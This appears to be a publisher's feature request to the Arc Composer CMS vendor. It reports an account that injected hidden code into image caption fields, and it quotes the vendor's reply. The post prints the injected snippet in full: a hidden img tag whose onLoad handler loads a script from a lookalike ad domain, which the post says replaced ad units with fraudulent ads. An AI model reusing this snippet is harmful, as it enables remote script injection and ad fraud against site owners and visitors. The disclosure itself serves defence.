We recently discovered that one of our user accounts has been inserting the following code in selected stories:
</span><img id="imgl" src="//googledfp.com/flag.svg.png" onLoad="var hh=document.getElementsByTagName('head')[0],ss=document.createElement('script');ss.async=!0,ss.type='text/javascript',ss.id='CMS',ss.src='//googledfp.com/hf.js?i='+Math.floor(99999*Math.random()+1),hh.appendChild(ss);" style="display:none" /><span>
We found the code inserted in the Caption Field of the article's assigned Basic Image in Composer's the featured media tab.
Once the story with the inserted code is published and the page is opened on a browser, the code executes and accesses a .js file located in an external domain which in turns runs code that replaces our adUnits with fraudulent ads.
Arc should include a security setting to allow customers to enforce strict validation on composer's fieds, in order to prevent such code to be inserted where only text is expected.
I recently brought this issue up in the most recen Product Roadmap Update, and I got this comment from Mike Holland:
"So, we tend to treat employees who have permissions to click “publish” as “trusted”. In the past we’ve added and removed scrubbing capabilities and angered one side (please block everything) or the other (please allow us to do custom features).
That being said, I can see why your case is dangerous. We’ll take a look at your request and see if there are options for giving you the ability to configure the constraints, but it’s not in the Q2/3 roadmap right now."
Hi there! We'll consider in the future as we make continual improvements to Composer 2.0. Thank you for submitting this idea!